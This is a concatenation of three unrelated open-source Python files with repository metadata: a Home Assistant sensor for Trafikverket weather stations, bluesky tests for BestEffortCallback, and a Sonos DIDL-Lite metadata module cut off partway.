from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Data provided by Trafikverket"
ATTR_MEASURE_TIME = 'measure_time'
ATTR_ACTIVE = 'active'
CONF_STATION = 'station'
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=10)
SCAN_INTERVAL = timedelta(seconds=300)
SENSOR_TYPES = {
'air_temp': [
'Air temperature', TEMP_CELSIUS,
'air_temp', 'mdi:thermometer', DEVICE_CLASS_TEMPERATURE],
'road_temp': [
'Road temperature', TEMP_CELSIUS,
'road_temp', 'mdi:thermometer', DEVICE_CLASS_TEMPERATURE],
'precipitation': [
'Precipitation type', None,
'precipitationtype', 'mdi:weather-snowy-rainy', None],
'wind_direction': [
'Wind direction', '°',
'winddirection', 'mdi:flag-triangle', None],
'wind_direction_text': [
'Wind direction text', None,
'winddirectiontext', 'mdi:flag-triangle', None],
'wind_speed': [
'Wind speed', 'm/s',
'windforce', 'mdi:weather-windy', None],
'humidity': [
'Humidity', '%',
'humidity', 'mdi:water-percent', DEVICE_CLASS_HUMIDITY],
'precipitation_amount': [
'Precipitation amount', 'mm',
'precipitation_amount', 'mdi:cup-water', None],
'precipitation_amountname': [
'Precipitation name', None,
'precipitation_amountname', 'mdi:weather-pouring', None],
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_STATION): cv.string,
vol.Required(CONF_MONITORED_CONDITIONS, default=[]):
[vol.In(SENSOR_TYPES)],
})
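# Example configuration.yaml entry (illustrative; the station name and API key are
# placeholders, and monitored_conditions must be keys of SENSOR_TYPES above):
#
#   sensor:
#     - platform: trafikverket_weatherstation
#       name: Road weather
#       api_key: YOUR_API_KEY
#       station: Vallby
#       monitored_conditions:
#         - air_temp
#         - road_temp
#         - humidity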
async def async_setup_platform(
hass, config, async_add_entities, discovery_info=None):
"""Set up the Trafikverket sensor platform."""
from pytrafikverket.trafikverket_weather import TrafikverketWeather
sensor_name = config[CONF_NAME]
sensor_api = config[CONF_API_KEY]
sensor_station = config[CONF_STATION]
web_session = async_get_clientsession(hass)
weather_api = TrafikverketWeather(web_session, sensor_api)
dev = []
for condition in config[CONF_MONITORED_CONDITIONS]:
dev.append(TrafikverketWeatherStation(
weather_api, sensor_name, condition, sensor_station))
if dev:
async_add_entities(dev, True)
class TrafikverketWeatherStation(Entity):
"""Representation of a Trafikverket sensor."""
def __init__(self, weather_api, name, sensor_type, sensor_station):
"""Initialize the sensor."""
self._client = name
self._name = SENSOR_TYPES[sensor_type][0]
self._type = sensor_type
self._state = None
self._unit = SENSOR_TYPES[sensor_type][1]
self._station = sensor_station
self._weather_api = weather_api
self._icon = SENSOR_TYPES[sensor_type][3]
self._device_class = SENSOR_TYPES[sensor_type][4]
self._weather = None
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self._client, self._name)
@property
def icon(self):
"""Icon to use in the frontend."""
return self._icon
@property
def device_state_attributes(self):
"""Return the state attributes of Trafikverket Weatherstation."""
return {
ATTR_ATTRIBUTION: ATTRIBUTION,
ATTR_ACTIVE: self._weather.active,
ATTR_MEASURE_TIME: self._weather.measure_time,
}
@property
def device_class(self):
"""Return the device class of the sensor."""
return self._device_class
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self):
"""Get the latest data from Trafikverket and updates the states."""
try:
self._weather = await self._weather_api.async_get_weather(
self._station)
self._state = getattr(
self._weather,
SENSOR_TYPES[self._type][2])
except (asyncio.TimeoutError,
aiohttp.ClientError, ValueError) as error:
_LOGGER.error("Could not fetch weather data: %s", error)
|
{
"content_hash": "a873c81c75b5e0077b0714d3b102f34d",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 77,
"avg_line_length": 32.71895424836601,
"alnum_prop": 0.6450259688373952,
"repo_name": "jabesq/home-assistant",
"id": "c846d020c848775fd6c20dc9c5bb89bfca32c71a",
"size": "5007",
"binary": false,
"copies": "7",
"ref": "refs/heads/dev",
"path": "homeassistant/components/trafikverket_weatherstation/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1829"
},
{
"name": "Python",
"bytes": "16238292"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17615"
}
],
"symlink_target": ""
}
|
import ast
import pytest
import jsonschema
import time as ttime
from datetime import datetime
from bluesky.plans import scan, grid_scan
import bluesky.preprocessors as bpp
import bluesky.plan_stubs as bps
from bluesky.preprocessors import SupplementalData
from bluesky.callbacks.best_effort import BestEffortCallback
from bluesky.utils import new_uid
from event_model import RunRouter
def test_hints(RE, hw):
motor = hw.motor
expected_hint = {'fields': [motor.name]}
assert motor.hints == expected_hint
collector = []
def collect(*args):
collector.append(args)
RE(scan([], motor, 1, 2, 2), {'descriptor': collect})
name, doc = collector.pop()
assert doc['hints'][motor.name] == expected_hint
def test_simple(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
RE(scan([hw.ab_det], hw.motor, 1, 5, 5))
def test_disable(RE, hw):
det, motor = hw.ab_det, hw.motor
bec = BestEffortCallback()
RE.subscribe(bec)
bec.disable_table()
RE(scan([det], motor, 1, 5, 5))
assert bec._table is None
bec.enable_table()
RE(scan([det], motor, 1, 5, 5))
assert bec._table is not None
bec.peaks.com
bec.peaks['com']
assert ast.literal_eval(repr(bec.peaks)) == vars(bec.peaks)
bec.clear()
assert bec._table is None
# smoke test
bec.disable_plots()
bec.enable_plots()
bec.disable_baseline()
bec.enable_baseline()
bec.disable_heading()
bec.enable_heading()
def test_blank_hints(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
RE(scan([hw.ab_det], hw.motor, 1, 5, 5, md={'hints': {}}))
def test_with_baseline(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
sd = SupplementalData(baseline=[hw.det])
RE.preprocessors.append(sd)
RE(scan([hw.ab_det], hw.motor, 1, 5, 5))
def test_underhinted_plan(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
@bpp.run_decorator()
def broken_plan(dets):
yield from bps.trigger_and_read(dets)
RE(broken_plan([hw.det]))
def test_live_grid(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
RE(grid_scan([hw.det4], hw.motor1, 0, 1, 1, hw.motor2, 0, 1, 2, True))
def test_push_start_document(capsys):
""" Pass the start document to BEC and verify if the scan information is printed correctly"""
bec = BestEffortCallback()
uid = new_uid()
time = ttime.time()
scan_id = 113435 # Just some arbitrary number
# Include minimum information needed to print the header
bec("start", {"scan_id": scan_id, "time": time, "uid": uid})
captured = capsys.readouterr()
assert f"Transient Scan ID: {scan_id}" in captured.out, \
"BestEffortCallback: Scan ID is not printed correctly"
tt = datetime.fromtimestamp(time).utctimetuple()
assert f"Time: {ttime.strftime('%Y-%m-%d %H:%M:%S', tt)}" in captured.out, \
"BestEffortCallback: Scan time is not printed correctly"
assert f"Persistent Unique Scan ID: '{uid}'" in captured.out, \
"BestEffortCallback: Scan UID is not printed correctly"
def test_multirun_nested_plan(capsys, caplog, RE, hw):
# This test only checks if the plan runs without crashing. If BEC crashes,
# the plan will still run, but data will not be displayed.
@bpp.set_run_key_decorator(run="inner_run")
def plan_inner():
yield from grid_scan([hw.det4], hw.motor1, 0, 1, 1, hw.motor2, 0, 1, 2, True)
def sequence():
for n in range(5):
yield from bps.mov(hw.motor, n * 0.1 + 1)
yield from bps.trigger_and_read([hw.det1])
@bpp.set_run_key_decorator(run="outer_run")
@bpp.stage_decorator([hw.det1, hw.motor])
@bpp.run_decorator(md={})
def plan_outer():
yield from sequence()
# Call inner plan from within the plan
yield from plan_inner()
# Run another set of commands
yield from sequence()
# The first test should fail. We check if expected error message is printed in case
# of failure.
bec = BestEffortCallback()
bec_token = RE.subscribe(bec)
RE(plan_outer())
captured = capsys.readouterr()
# Check for the number of runs (the number of times UID is printed in the output)
scan_uid_substr = "Persistent Unique Scan ID"
n_runs = captured.out.count(scan_uid_substr)
assert n_runs == 2, "scan output contains incorrect number of runs"
# Check if the expected error message is printed once the callback fails. The same
# substring will be used in the second part of the test to check if BEC did not fail.
err_msg_substr = "is being suppressed to not interrupt plan execution"
assert err_msg_substr in str(caplog.text), \
"Best Effort Callback failed, but expected error message was not printed"
RE.unsubscribe(bec_token)
caplog.clear()
# The second test should succeed, i.e. the error message should not be printed
def factory(name, doc):
bec = BestEffortCallback()
return [bec], []
rr = RunRouter([factory])
RE.subscribe(rr)
RE(plan_outer())
captured = capsys.readouterr()
n_runs = captured.out.count(scan_uid_substr)
assert n_runs == 2, "scan output contains incorrect number of runs"
assert err_msg_substr not in caplog.text, \
"Best Effort Callback failed while executing nested plans"
@pytest.mark.xfail(not (jsonschema.__version__.split('.') < ['3', ]),
reason='Deprecations in jsonschema')
def test_plot_ints(RE):
from ophyd import Signal
from bluesky.callbacks.best_effort import BestEffortCallback
from bluesky.plans import count
import bluesky.plan_stubs as bps
bec = BestEffortCallback()
RE.subscribe(bec)
s = Signal(name='s')
RE(bps.mov(s, int(0)))
assert s.describe()['s']['dtype'] == 'integer'
s.kind = 'hinted'
with pytest.warns(None) as record:
RE(count([s], num=35))
assert len(record) == 0
def test_plot_prune_fifo(RE, hw):
bec = BestEffortCallback()
RE.subscribe(bec)
num_pruned = 2
# create the LivePlot
RE(bps.repeater(num_pruned, scan, [hw.ab_det], hw.motor, 1, 5, 5))
# test it
assert len(bec._live_plots) == 1
# get the reference key for our LivePlot dict
uuid = next(iter(bec._live_plots))
assert len(bec._live_plots[uuid]) == 1
# get reference key for our detector
det_name = next(iter(bec._live_plots[uuid]))
# should be same as hw.ab_det.a.name (`.a` comes from .read_attrs[0]), prove it now
assert det_name == hw.ab_det.a.name
# get the LivePlot object
lp = bec._live_plots[uuid][det_name]
assert lp is not None
assert len(lp.ax.lines) == num_pruned
# prune the LivePlot (has no effect since we have exact number to keep)
bec.plot_prune_fifo(num_pruned, hw.motor, hw.ab_det.a)
assert len(lp.ax.lines) == num_pruned
# add more lines to the LivePlot
RE(bps.repeater(num_pruned, scan, [hw.ab_det], hw.motor, 1, 5, 5))
# get the LivePlot object, again, in case the UUID was changed
assert len(bec._live_plots) == 1
uuid = next(iter(bec._live_plots))
lp = bec._live_plots[uuid][det_name]
assert lp is not None
assert len(lp.ax.lines) == num_pruned * 2
# prune again, this time reduces number of lines
bec.plot_prune_fifo(num_pruned, hw.motor, hw.ab_det.a)
assert len(lp.ax.lines) == num_pruned
|
{
"content_hash": "eab5ccfda90f3990026c6d1428c472b6",
"timestamp": "",
"source": "github",
"line_count": 242,
"max_line_length": 97,
"avg_line_length": 30.71900826446281,
"alnum_prop": 0.6524078557976863,
"repo_name": "ericdill/bluesky",
"id": "09870872ddc6b0d65e14d2787149b58224822a87",
"size": "7434",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "bluesky/tests/test_bec.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "331516"
},
{
"name": "Shell",
"bytes": "104"
}
],
"symlink_target": ""
}
|
""" This module contains classes for handling DIDL-Lite metadata.
This is the XML schema used by Sonos for carrying metadata representing many
items such as tracks, playlists, composers, albums etc.
"""
# It tries to follow the class hierarchy provided by the DIDL-Lite schema
# described in the UPnP Spec, especially that for the ContentDirectory Service
# Although Sonos uses ContentDirectory v1, the document for v2 is more helpful:
# http://upnp.org/specs/av/UPnP-av-ContentDirectory-v2-Service.pdf
from __future__ import unicode_literals
import sys
import warnings
warnings.simplefilter('always', DeprecationWarning)
import textwrap
from .xml import XML, ns_tag
from .exceptions import DIDLMetadataError
from .utils import really_unicode
###############################################################################
# MISC HELPER FUNCTIONS #
###############################################################################
def to_didl_string(*args):
""" Convert any number of DIDLObjects to a unicode xml string.
Args:
*args (DidlObject): One or more DidlObject (or subclass) instances
Returns:
str: A unicode string of the form <DIDL-Lite ...>...</DIDL-Lite>
representing the instances
"""
didl = XML.Element(
'DIDL-Lite',
{
'xmlns': "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/",
'xmlns:dc': "http://purl.org/dc/elements/1.1/",
'xmlns:upnp': "urn:schemas-upnp-org:metadata-1-0/upnp/",
})
for arg in args:
didl.append(arg.to_element())
if sys.version_info[0] == 2:
return XML.tostring(didl)
else:
return XML.tostring(didl, encoding='unicode')
def from_didl_string(string):
""" Convert a unicode xml string to a list of DIDLObjects.
Arg:
string (str): A unicode string containing an xml representation of one
or more DIDL-Lite items (in the form <DIDL-Lite ...>
...</DIDL-Lite> )
Returns:
list: A list of one or more instances of DIDLObject or a subclass
"""
items = []
root = XML.fromstring(string.encode('utf-8'))
for elt in root:
if elt.tag.endswith('item') or elt.tag.endswith('container'):
item_class = elt.findtext(ns_tag('upnp', 'class'))
try:
cls = _DIDL_CLASS_TO_CLASS[item_class]
except KeyError:
raise DIDLMetadataError("Unknown UPnP class: %s" % item_class)
items.append(cls.from_element(elt))
else:
# <desc> elements are allowed as an immediate child of <DIDL-Lite>
# according to the spec, but I have not seen one there in Sonos, so
# we treat them as illegal. May need to fix this if this
# causes problems.
raise DIDLMetadataError("Illegal child of DIDL element: <%s>"
% elt.tag)
return items
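# Illustrative round-trip sketch (not part of the module): given any DidlObject
# subclass instance, serialising with to_didl_string() and parsing the result
# with from_didl_string() should give back an equal object, e.g.
#
#     xml_str = to_didl_string(some_didl_item)
#     assert from_didl_string(xml_str)[0] == some_didl_item
#
# Here `some_didl_item` stands for any previously constructed DIDL item.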
###############################################################################
# DIDL RESOURCE #
###############################################################################
class DidlResource(object):
""" Identifies a resource, typically some type of a binary asset, such as
a song.
A 'res' element contains a uri that identifies the resource.
"""
# Adapted from a class taken from the Python Brisa project - MIT licence.
# pylint: disable=too-many-instance-attributes
def __init__(self, uri, protocol_info, import_uri=None, size=None,
duration=None, bitrate=None, sample_frequency=None,
bits_per_sample=None, nr_audio_channels=None, resolution=None,
color_depth=None, protection=None):
""" Constructor for the Resource class.
Args:
            uri (str): value of the res tag, typically a URI. It MUST be a
                properly escaped URI as described in RFC 2396
protocol_info (str): A string in the form a:b:c:d that
identifies the streaming or transport protocol for
transmitting the resource. A value is required. For more
information see section 2.5.2 at
http://upnp.org/specs/av/UPnP-av-ConnectionManager-v1-Service.pdf
import_uri (str, optional): uri locator for resource update
size (int, optional): size in bytes
duration (str, optional): duration of the playback of the res
at normal speed (H*:MM:SS:F* or H*:MM:SS:F0/F1)
bitrate (int, optional): bitrate in bytes/second
sample_frequency (int, optional): sample frequency in Hz
bits_per_sample (int, optional): bits per sample
nr_audio_channels (int, optional): number of audio channels
resolution (str, optional): resolution of the resource (X*Y)
color_depth (int, optional): color depth in bits
protection (str, optional): statement of protection type
"""
# Of these attributes, only uri, protocol_info and duration have been
# spotted 'in the wild'
self.uri = uri
# Protocol info is in the form a:b:c:d - see
# sec 2.5.2 at
# http://upnp.org/specs/av/UPnP-av-ConnectionManager-v1-Service.pdf
self.protocol_info = protocol_info
self.import_uri = import_uri
self.size = size
self.duration = duration
self.bitrate = bitrate
self.sample_frequency = sample_frequency
self.bits_per_sample = bits_per_sample
self.nr_audio_channels = nr_audio_channels
self.resolution = resolution
self.color_depth = color_depth
self.protection = protection
@classmethod
def from_element(cls, element):
""" Set the resource properties from a <res> element.
Arg:
element (Element): An ElementTree Element
"""
def _int_helper(name):
"""Try to convert the name attribute to an int, or None."""
result = element.get(name)
if result is not None:
try:
return int(result)
except ValueError:
raise ValueError(
'Could not convert {0} to an integer'.format(name))
else:
return None
content = {}
# required
content['protocol_info'] = element.get('protocolInfo')
if content['protocol_info'] is None:
raise Exception('Could not create Resource from Element: '
'protocolInfo not found (required).')
# Optional
content['import_uri'] = element.get('importUri')
content['size'] = _int_helper('size')
content['duration'] = element.get('duration')
content['bitrate'] = _int_helper('bitrate')
content['sample_frequency'] = _int_helper('sampleFrequency')
content['bits_per_sample'] = _int_helper('bitsPerSample')
content['nr_audio_channels'] = _int_helper('nrAudioChannels')
content['resolution'] = element.get('resolution')
content['color_depth'] = _int_helper('colorDepth')
content['protection'] = element.get('protection')
content['uri'] = element.text
return cls(**content)
def __repr__(self):
return '<{0} \'{1}\' at {2}>'.format(self.__class__.__name__,
self.uri,
hex(id(self)))
def __str__(self):
return self.__repr__()
def to_element(self):
""" Return an ElementTree Element based on this resource."""
if not self.protocol_info:
raise Exception('Could not create Element for this resource: '
'protocolInfo not set (required).')
root = XML.Element('res')
# Required
root.attrib['protocolInfo'] = self.protocol_info
# Optional
if self.import_uri is not None:
root.attrib['importUri'] = self.import_uri
if self.size is not None:
root.attrib['size'] = str(self.size)
if self.duration is not None:
root.attrib['duration'] = self.duration
if self.bitrate is not None:
root.attrib['bitrate'] = str(self.bitrate)
if self.sample_frequency is not None:
root.attrib['sampleFrequency'] = str(self.sample_frequency)
if self.bits_per_sample is not None:
root.attrib['bitsPerSample'] = str(self.bits_per_sample)
if self.nr_audio_channels is not None:
root.attrib['nrAudioChannels'] = str(self.nr_audio_channels)
if self.resolution is not None:
root.attrib['resolution'] = self.resolution
if self.color_depth is not None:
root.attrib['colorDepth'] = str(self.color_depth)
if self.protection is not None:
root.attrib['protection'] = self.protection
root.text = self.uri
return root
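# Usage sketch for DidlResource (illustrative only; the uri and protocol_info
# values below are made-up placeholders):
#
#     res = DidlResource(
#         uri='x-file-cifs://server/share/track.mp3',
#         protocol_info='http-get:*:audio/mpeg:*')
#     res_elt = res.to_element()      # -> <res protocolInfo="...">...</res>
#     same = DidlResource.from_element(res_elt)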
###############################################################################
# BASE OBJECTS #
###############################################################################
# a mapping which will be used to look up the relevant class from the
# DIDL item class
_DIDL_CLASS_TO_CLASS = {}
class DidlMetaClass(type):
"""Meta class for all Didl objects."""
def __new__(mcs, name, bases, attrs):
"""Create a new instance.
Args:
name: Name of the class
bases: Base classes (tuple)
attrs: Attributes defined for the class
"""
new_cls = super(DidlMetaClass, mcs).__new__(mcs, name, bases, attrs)
# Register all subclasses with the global _DIDL_CLASS_TO_CLASS mapping
item_class = attrs.get('item_class', None)
if item_class is not None:
_DIDL_CLASS_TO_CLASS[item_class] = new_cls
return new_cls
# Py2/3 compatible way of declaring the metaclass
class DidlObject(DidlMetaClass(str('DidlMetaClass'), (object,), {})):
"""Abstract base class for all DIDL-Lite items.
You should not need to instantiate this.
Attributes:
item_class (str): The DIDL Lite class for this object
tag (str): The XML element tag name used for this instance
_translation (dict): A dict used to translate between instance
attribute names and XML tags/namespaces. It also serves to define
the allowed tags/attributes for this instance. Overridden and
extended by subclasses.
"""
item_class = 'object'
tag = 'item'
# key: attribute_name: (ns, tag)
_translation = {
'creator': ('dc', 'creator'),
'write_status': ('upnp', 'writeStatus'),
}
def __init__(self, title, parent_id, item_id, restricted=True,
resources=None, desc='RINCON_AssociatedZPUDN', **kwargs):
r"""Construct and initialize a DidlObject.
Args:
title (str): The title for the item
parent_id (str): The parent ID for the item
item_id (str): The ID for the item
restricted (bool): Whether the item can be modified
resources (list): A list of resources for this object
desc (str): A didl descriptor, default RINCON_AssociatedZPUDN. This
is not the same as "description"! It is used for identifying
the relevant music service
**kwargs: Extra metadata. What is allowed depends on the
_translation class attribute, which in turn depends on the DIDL
class
"""
# All didl objects *must* have a title, a parent_id and an item_id
# so we specify these as required args in the constructor signature
# to ensure that we get them. Other didl object properties are
# optional, so can be passed as kwargs.
# The content of _translation is adapted from the list in table C at
# http://upnp.org/specs/av/UPnP-av-ContentDirectory-v2-Service.pdf
# Not all properties referred to there are catered for, since Sonos
# does not use some of them.
# pylint: disable=super-on-old-class
super(DidlObject, self).__init__()
self.title = title
self.parent_id = parent_id
self.item_id = item_id
# Restricted is a compulsory attribute, but is almost always True for
# Sonos. (Only seen it 'false' when browsing favorites)
self.restricted = restricted
# Resources is multi-valued, and dealt with separately
self.resources = [] if resources is None else resources
# According to the spec, there may be one or more desc values. Sonos
# only seems to use one, so we won't bother with a list
self.desc = desc
for key, value in kwargs.items():
# For each attribute, check to see if this class allows it
if key not in self._translation:
                raise ValueError(
                    'The key \'{0}\' is not allowed as an argument. Only '
                    'these keys are allowed: parent_id, item_id, title, '
                    'restricted, resources, desc, '
                    '{1}'.format(key, ', '.join(self._translation.keys())))
# It is an allowed attribute. Set it as an attribute on self, so
# that it can be accessed as Classname.attribute in the normal
# way.
setattr(self, key, value)
@classmethod
def from_element(cls, element):
"""Create an instance of this class from an ElementTree xml Element.
An alternative constructor. The element must be a DIDL-Lite <item> or
<container> element, and must be properly namespaced.
Arg:
xml (Element): An :py:class:`xml.etree.ElementTree.Element` object.
"""
# Check we have the right sort of element. tag can be an empty string
# which indicates that any tag is allowed (see eg the musicAlbum DIDL
# class)
if not element.tag.endswith(cls.tag):
raise DIDLMetadataError(
"Wrong element. Expected '<{0}>',"
" got '<{1}>'".format(cls.tag, element.tag))
# and that the upnp matches what we are expecting
item_class = element.find(ns_tag('upnp', 'class')).text
if item_class != cls.item_class:
raise DIDLMetadataError(
"UPnP class is incorrect. Expected '{0}',"
" got '{1}'".format(cls.item_class, item_class))
        # parent_id, item_id and restricted are stored as attributes on the
# element
        # Check for missing attributes before converting them, since passing
        # None through really_unicode() would hide a missing attribute.
        item_id = element.get('id', None)
        if item_id is None:
            raise DIDLMetadataError("Missing id attribute")
        item_id = really_unicode(item_id)
        parent_id = element.get('parentID', None)
        if parent_id is None:
            raise DIDLMetadataError("Missing parentID attribute")
        parent_id = really_unicode(parent_id)
restricted = element.get('restricted', None)
if restricted is None:
raise DIDLMetadataError("Missing restricted attribute")
restricted = True if restricted in [1, 'true', 'True'] else False
# There must be a title. According to spec, it should be the first
# child, but Sonos does not abide by this
title_elt = element.find(ns_tag('dc', 'title'))
if title_elt is None:
raise DIDLMetadataError(
"Missing title element")
title = really_unicode(title_elt.text)
# Deal with any resource elements
resources = []
for res_elt in element.findall(ns_tag('', 'res')):
resources.append(
DidlResource.from_element(res_elt))
# and the desc element (There is only one in Sonos)
desc = element.findtext(ns_tag('', 'desc'))
# Get values of the elements listed in _translation and add them to
# the content dict
content = {}
for key, value in cls._translation.items():
result = element.findtext(ns_tag(*value))
if result is not None:
# We store info as unicode internally.
content[key] = really_unicode(result)
# Convert type for original track number
if content.get('original_track_number') is not None:
content['original_track_number'] = \
int(content['original_track_number'])
# Now pass the content dict we have just built to the main
# constructor, as kwargs, to create the object
return cls(title=title, parent_id=parent_id, item_id=item_id,
restricted=restricted, resources=resources, desc=desc,
**content)
@classmethod
def from_dict(cls, content):
"""Create an instance from a dict.
An alternative constructor. Equivalent to DidlObject(**content).
Arg:
            content (dict): Dict containing metadata information. Required and
valid arguments are the same as for the ``__init__`` method.
"""
# Do we really need this constructor? Could use DidlObject(**content)
# instead.
return cls(**content)
def __eq__(self, playable_item):
"""Compare with another ``playable_item``.
Returns:
(bool): True if items are equal, else False
"""
if not isinstance(playable_item, DidlObject):
return False
return self.to_dict() == playable_item.to_dict()
def __ne__(self, playable_item):
"""Compare with another ``playable_item``.
Returns:
(bool): True if items are unequal, else False
"""
if not isinstance(playable_item, DidlObject):
return True
return self.to_dict() != playable_item.to_dict()
def __repr__(self):
"""Return the repr value for the item.
The repr is of the form::
<class_name 'middle_part[0:40]' at id_in_hex>
where middle_part is either the title item in content, if it is set,
or ``str(content)``. The output is also cleared of non-ascii
characters.
"""
# 40 originates from terminal width (78) - (15) for address part and
# (19) for the longest class name and a little left for buffer
if self.title is not None:
middle = self.title.encode('ascii', 'replace')[0:40]
else:
middle = str(self.to_dict).encode('ascii', 'replace')[0:40]
return '<{0} \'{1}\' at {2}>'.format(self.__class__.__name__,
middle,
hex(id(self)))
def __str__(self):
"""Return the str value for the item::
<class_name 'middle_part[0:40]' at id_in_hex>
where middle_part is either the title item in content, if it is set, or
``str(content)``. The output is also cleared of non-ascii characters.
"""
return self.__repr__()
def to_dict(self):
"""Return the dict representation of the instance."""
content = {}
# Get the value of each attribute listed in _translation, and add it
# to the content dict
for key in self._translation:
if hasattr(self, key):
content[key] = getattr(self, key)
# also add parent_id, item_id, restricted, title and resources because
# they are not listed in _translation
content['parent_id'] = self.parent_id
content['item_id'] = self.item_id
content['restricted'] = self.restricted
content['title'] = self.title
if self.resources != []:
content['resources'] = self.resources
content['desc'] = self.desc
return content
def to_element(self, include_namespaces=False):
"""Return an ElementTree Element representing this instance.
Arg:
include_namespaces (bool, optional): If True, include xml
namespace attributes on the root element
Return:
An ElementTree Element
.. code :: xml
<DIDL-Lite ..NS_INFO..>
<item id="...self.item_id..."
parentID="...cls.parent_id..." restricted="true">
<dc:title>...self.title...</dc:title>
<upnp:class>...self.item_class...</upnp:class>
<desc id="cdudn"
nameSpace="urn:schemas-rinconnetworks-com:metadata-1-0/">
RINCON_AssociatedZPUDN
</desc>
</item>
</DIDL-Lite>
"""
elt_attrib = {}
if include_namespaces:
elt_attrib.update({
'xmlns': "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/",
'xmlns:dc': "http://purl.org/dc/elements/1.1/",
'xmlns:upnp': "urn:schemas-upnp-org:metadata-1-0/upnp/",
})
elt_attrib.update({
'parentID': self.parent_id,
'restricted': 'true' if self.restricted else 'false',
'id': self.item_id
})
elt = XML.Element(self.tag, elt_attrib)
# Add the title, which should always come first, according to the spec
XML.SubElement(elt, 'dc:title').text = self.title
# Add in any resources
for resource in self.resources:
elt.append(resource.to_element())
# Add the rest of the metadata attributes (i.e all those listed in
# _translation) as sub-elements of the item element.
for key, value in self._translation.items():
if hasattr(self, key):
# Some attributes have a namespace of '', which means they
# are in the default namespace. We need to handle those
# carefully
tag = "%s:%s" % value if value[0] else "%s" % value[1]
XML.SubElement(elt, tag).text = ("%s" % getattr(self, key))
# Now add in the item class
XML.SubElement(elt, 'upnp:class').text = self.item_class
# And the desc element
desc_attrib = {'id': 'cdudn', 'nameSpace':
'urn:schemas-rinconnetworks-com:metadata-1-0/'}
desc_elt = XML.SubElement(elt, 'desc', desc_attrib)
desc_elt.text = self.desc
return elt
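# Construction sketch (illustrative; the ids and title are placeholders):
#
#     obj = DidlObject(title='Example title', parent_id='A:PARENT',
#                      item_id='A:ITEM', creator='Example creator')
#     print(to_didl_string(obj))   # serialises via DidlObject.to_element()
#
# 'creator' is accepted because it appears in DidlObject._translation; any
# keyword not listed there raises ValueError in __init__.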
###############################################################################
# OBJECT.ITEM HIERARCHY #
###############################################################################
class DidlItem(DidlObject):
"""A basic content directory item."""
    # The spec allows for an optional 'refID' attribute, but we do not handle it
item_class = 'object.item'
# _translation = DidlObject._translation.update({ ...})
# does not work, but doing it in two steps does
_translation = DidlObject._translation.copy()
_translation.update(
{
'stream_content': ('r', 'streamContent'),
'radio_show': ('r', 'radioShowMd'),
'album_art_uri': ('upnp', 'albumArtURI'),
}
)
class DidlAudioItem(DidlItem):
"""An audio item."""
item_class = 'object.item.audioitem'
_translation = DidlItem._translation.copy()
_translation.update(
{
'genre': ('upnp', 'genre'),
'description': ('dc', 'description'),
'long_description': ('upnp', 'longDescription'),
'publisher': ('dc', 'publisher'),
'language': ('dc', 'language'),
'relation': ('dc', 'relation'),
'rights': ('dc', 'rights'),
}
)
# Browsing Sonos Favorites produces some odd looking DIDL-Lite. The object
# class is 'object.itemobject.item.sonos-favorite', which is probably a typo
# in Sonos' code somewhere.
# Here is an example:
# <?xml version="1.0" ?>
# <DIDL-Lite xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
# xmlns:dc="http://purl.org/dc/elements/1.1/"
# xmlns:r="urn:schemas-rinconnetworks-com:metadata-1-0/"
# xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/">
# <item id="FV:2/13" parentID="FV:2" restricted="false">
# <dc:title>Shake It Off</dc:title>
# <upnp:class>object.itemobject.item.sonos-favorite</upnp:class>
# <r:ordinal>4</r:ordinal>
# <res protocolInfo="sonos.com-spotify:*:audio/x-spotify:*">
# x-sonos-spotify:spotify%3atrack%3a7n.......?sid=9&flags=32</res>
# <upnp:albumArtURI>http://o.scd.....</upnp:albumArtURI>
# <r:type>instantPlay</r:type>
# <r:description>By Taylor Swift</r:description>
# <r:resMD><DIDL-Lite xmlns:dc="
# http://purl.org/dc/elements/1.1/"
# xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/"
# xmlns:r="urn:schemas-rinconnetworks-com:metadata-1-0/"
# xmlns="urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/">
# <item id="00030020spotify%3atrack%3a7n9Q6b...74uCtajkddPt"
# parentID="0006006ctoplist%2ftracks%2fregion%2fGB"
# restricted="true"><dc:title>Shake It Off
# </dc:title><upnp:class>object.item.audioItem.musicTrack
# </upnp:class><desc id="cdudn"
# nameSpace="urn:schemas-rinconnetworks-com:metadata-1-0/">
# SA_RINCON2311_XXXXX</desc>
# </item>
# </DIDL-Lite>
# </r:resMD>
# </item>
# </DIDL-Lite>
# Note the r:ordinal, r:type; r:description, r:resMD elements which are not
# seen (?) anywhere else
# We're ignoring this for the moment!
class DidlMusicTrack(DidlAudioItem):
"""Class that represents a music library track. """
item_class = 'object.item.audioItem.musicTrack'
# name: (ns, tag)
_translation = DidlAudioItem._translation.copy()
_translation.update(
{
'artist': ('upnp', 'artist'),
'album': ('upnp', 'album'),
'original_track_number': ('upnp', 'originalTrackNumber'),
'playlist': ('upnp', 'playlist'),
'contributor': ('dc', 'contributor'),
'date': ('dc', 'date'),
}
)
class DidlAudioBroadcast(DidlAudioItem):
"""Class that represents an audio broadcast."""
item_class = 'object.item.audioItem.audioBroadcast'
